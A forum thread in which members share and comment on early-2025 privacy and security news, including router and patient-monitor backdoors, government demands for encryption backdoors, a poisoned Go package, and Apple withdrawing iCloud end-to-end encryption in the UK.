Privacy lost...

nsaspook · Jan 25, 2025

https://www.theregister.com/2025/01/25/mysterious_backdoor_juniper_routers/
Someone is slipping a hidden backdoor into Juniper routers across the globe, activated by a magic packet

nsaspook · Jan 25, 2025

https://www.techradar.com/computing...ropol-chiefs-request-for-encryption-back-door
"Anonymity is not a fundamental right": experts disagree with Europol chief's request for encryption back door

nsaspook · Jan 25, 2025

joeyd999 said:
Wait. The FBI doesn't encrypt their communications?

https://www.ibtimes.com/fbi-att-hacker-breach-3759795

joeyd999 · Jan 25, 2025

nsaspook said:
https://www.theregister.com/2025/01/25/mysterious_backdoor_juniper_routers/
Someone is slipping a hidden backdoor into Juniper routers across the globe, activated by a magic packet

This is why I have built my own routers for the past 20 years.

joeyd999 · Jan 25, 2025

nsaspook said:
https://www.techradar.com/computing...ropol-chiefs-request-for-encryption-back-door
"Anonymity is not a fundamental right": experts disagree with Europol chief's request for encryption back door

“Show me the man and I’ll show you the crime.”

How far the West has fallen.

joeyd999 · Jan 26, 2025

Any idiot who shares sensitive personal information with a porn site operator is both stupid and more stupid.

https://www.forbes.com/sites/zakdof...ons-of-iphone-ipad-android-users-now-at-risk/

nsaspook · Jan 31, 2025

https://www.bleepingcomputer.com/ne...hcare-patient-monitors-linked-to-ip-in-china/
Backdoor found in two healthcare patient monitors, linked to IP in China

CISA learned of the malicious behavior from an external researcher who disclosed the vulnerability to the agency. When CISA tested three Contec CMS8000 firmware packages, the researchers discovered anomalous network traffic to a hard-coded external IP address, which is not associated with the company but rather a university.

This led to the discovery of a backdoor in the company's firmware that would quietly download and execute files on the device, allowing for remote execution and the complete takeover of the patient monitors. It was also discovered that the device would quietly send patient data to the same hard-coded address when devices were started.

None of this activity was logged, causing the malicious activity to be conducted secretly without alerting administrators of the devices.

While CISA did not name the university and redacted the IP address, BleepingComputer has learned that it is associated with a Chinese university. Furthermore, the IP address is also hard-coded in software for other medical equipment, including a pregnancy patient monitor from another healthcare manufacturer in China

https://www.cisa.gov/sites/default/...t-contec-cms8000-contains-a-backdoor-508c.pdf

WBahn · Jan 31, 2025

nsaspook said:
https://www.bleepingcomputer.com/ne...hcare-patient-monitors-linked-to-ip-in-china/
Backdoor found in two healthcare patient monitors, linked to IP in China

https://www.cisa.gov/sites/default/...t-contec-cms8000-contains-a-backdoor-508c.pdf

Loved this part:

After contacting Contec about the backdoor, CISA was sent multiple firmware images that were supposed to have mitigated the backdoor.

However, each one continued to contain the malicious code, with the company simply disabling the 'eth0' network adapter to mitigate the backdoor. However, this mitigation does not help as the script specifically enables it using the ifconfig eth0 up command before mounting the remote NFS share or sending patient data.

Translations: Here you go, stupid Americans. We've disabled eth0 so everything is fine now. Don't worry that we've left in the original code and that it enables eth0, everything is fine now. Trust us.

nsaspook · Jan 31, 2025

WBahn said:
Loved this part:

Translations: Here you go, stupid Americans. We've disabled eth0 so everything is fine now. Don't worry that we've left in the original code and that it enables eth0, everything is fine now. Trust us.

That makes our job easier as they are the stupid ones. The default should be that any network device from China has a backdoor mandate from the CCP.

MrAl · Jan 31, 2025

WBahn said:
Loved this part:

Translations: Here you go, stupid Americans. We've disabled eth0 so everything is fine now. Don't worry that we've left in the original code and that it enables eth0, everything is fine now. Trust us.

Everything and everyone just keeps getting stupider and stupider as time goes on. I see this so much it almost makes me sick.
We see security breaches so much with huge data banks makes you wonder who the heck designs this stuff.
Maybe there is something in the air

joeyd999 · Jan 31, 2025

MrAl said:
Everything and everyone just keeps getting stupider and stupider as time goes on.

That is the natural consequence of hiring based upon any quality other than competence to do the job.

MrAl · Jan 31, 2025

joeyd999 said:
That is the natural consequence of hiring based upon any quality other than competence to do the job.

Ha!
And who's doing the hiring ... the stupid leading the stupid

That's where we get stupid^2 (ha ha).

nsaspook · Jan 31, 2025

MrAl said:
Everything and everyone just keeps getting stupider and stupider as time goes on. I see this so much it almost makes me sick.
We see security breaches so much with huge data banks makes you wonder who the heck designs this stuff.
Maybe there is something in the air

This is not stupidity, this is a targeted attack vector per official CCP spying edict on all capable products sold to their people and anyone else buying those products. The only stupidity is thinking this is a isolated incident. IMO This one was just easy to find.

https://www.techtarget.com/searchse...gle-details-adversarial-AI-activity-on-Gemini

Google identified APTs from more than 20 countries that used Gemini. Iranian actors were the heaviest Gemini users for both APT and IO threat activity, using it for a wide range of aforementioned adversarial AI activity. Chinese APTs used Gemini for reconnaissance, coding development and troubleshooting, and research on how to gain deeper access into target networks.

North Korean actors used Gemini similarly to China, though they also used it to research topics such as cryptocurrency, the South Korean military and free hosting providers. Russian use was predominantly coding assistance, though Google "observed limited use of Gemini during the period of analysis."

joeyd999 · Jan 31, 2025

nsaspook said:
This is not stupidity,..

I'm pretty sure he said everything and everyone.

nsaspook · Feb 7, 2025

https://www.theverge.com/news/608145/apple-uk-icloud-encrypted-backups-spying-snoopers-charter
Apple ordered to open encrypted user accounts globally to UK spying

The secret order would give the UK access to encrypted backups belonging to any user — not just Brits.

The UK has reportedly served Apple a document called a technical capability notice. It’s a criminal offense to even reveal that the government has made a demand. Similarly, if Apple did accede to the UK’s demands then it apparently would not be allowed to warn users that its encrypted service is no longer fully secure.

This is insanity. The genie is long out of the bottle. The attempt is an arrogant blast of a 1984 type lost cause to keep people safe

cmartinez · Feb 7, 2025

nsaspook said:
https://www.theverge.com/news/608145/apple-uk-icloud-encrypted-backups-spying-snoopers-charter
Apple ordered to open encrypted user accounts globally to UK spying

This is insanity. The genie is long out of the bottle. The attempt is an arrogant blast of a 1984 type lost cause to keep people safe

That would be the dream scenario of all governments on the planet. Complete and unrestricted access to people's private lives under the excuse of national safety.

This will be a never ending struggle between private citizens and people in power. And the citizens must never yield. Otherwise the way back to privacy, peace and tranquility will become almost impossible.

nsaspook · Feb 9, 2025

https://www.theregister.com/2025/02/04/golang_supply_chain_attack/

Poisoned Go programming language package lay undetected for 3 years

Regardless, Boychenko says the way in which the creator exploited Go's package system highlights a flaw that requires greater understanding among developers.

The original boltdb-go package was published to GitHub. When it is first requested, the Go Module Mirror service caches the package and makes it available indefinitely.

The malicious project author then modified the project's Git tags to point to the legitimate version (boltdb) so that a manual review of boltdb-go wouldn't reveal any signs of foul play, all while the malicious version was still being served to unsuspecting developers.

Proxy cache attack, that's a good one

cmartinez · Feb 19, 2025

Not sure if this subject belongs in this thread, but it's definitely worth giving it some thought and consideration. I hope Amazon gets hacked the hell out for this extremely unfair and abusive practice:

Amazon is quietly removing the ability to download your Kindle books to your computer starting February 26. After that, your entire digital library will be locked within their ecosystem, with no way to back it up.

https://www.instagram.com/reel/DGQDrQagu55/

MrAl · Feb 20, 2025

cmartinez said:
Not sure if this subject belongs in this thread, but it's definitely worth giving it some thought and consideration. I hope Amazon gets the hell hacked out for this extremely unfair and abusive practice:

Amazon is quietly removing the ability to download your Kindle books to your computer starting February 26. After that, your entire digital library will be locked within their ecosystem, with no way to back it up.

https://www.instagram.com/reel/DGQDrQagu55/

That's one of the problems with 'online' things. There are no laws protecting the consumer.
The standard practice today is to get consumers 'hooked' onto a free product, then once enough members are using it, they change something that means the consumer pays in one way or another. That's what clearly pisses people off.
Think about what they did with Amazon Prime Video, all of a sudden there are commercials unless you pay extra now.
Imagine how many people that were using Amazon Prime Video who got the surprise one day.

nsaspook · Feb 21, 2025

https://9to5mac.com/2025/02/21/apple-removing-end-to-encryption-uk/
Apple is removing iCloud end-to-encryption features from the UK after government compelled it to add backdoors

For UK users with Advanced Data Protection currently active, Apple warns they will soon have to disable this feature to keep being able to use their iCloud account. Because of the end-to-end nature of the system, Apple cannot automatically do this. Apple will be releasing additional documentation soon to lay out the migration path for these customers.

Thread starter	Similar threads	Forum	Replies	Date
	Privacy and security tips for windows android and ios	Off-Topic	0	Jan 2, 2026
B	Kindle privacy issue.	Off-Topic	16	Nov 3, 2022
	Indeed and California's latest privacy law	Jobs & Career Advising	0	Jan 1, 2020
S	Is this a wi-fi system?	General Electronics Chat	5	Nov 26, 2019
	Internet Privacy Repeal, For or Against?	Off-Topic	35	Apr 6, 2017

Privacy lost...

Join our Engineering Community! Sign-in with:

Privacy lost...

nsaspook

nsaspook

nsaspook

joeyd999

joeyd999

joeyd999

nsaspook

WBahn

nsaspook

MrAl

joeyd999

MrAl

nsaspook

joeyd999

nsaspook

cmartinez

nsaspook

cmartinez

MrAl

nsaspook

You May Also Like

Analog Devices Unveils 2.0 Version of Its In-Cabin Automotive Audio Bus

Altera Intros Upgrade of FPGA AI Suite Enabling Determinism for Physical AI

Why Gold-Plated Tactile Switches Matter in Next Gen High-End Electronics

Designing Ultra-Low-Power Smart Thermostats with Latching Solid-State Relays